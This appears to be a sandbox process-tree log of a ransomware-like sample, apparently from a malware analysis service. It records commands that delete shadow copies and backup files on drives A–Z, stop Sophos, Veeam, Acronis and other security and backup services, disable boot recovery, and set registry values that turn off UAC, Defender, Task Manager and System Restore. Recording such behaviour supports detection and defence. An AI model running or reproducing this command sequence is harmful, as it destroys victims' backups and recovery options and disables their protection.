C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵
-
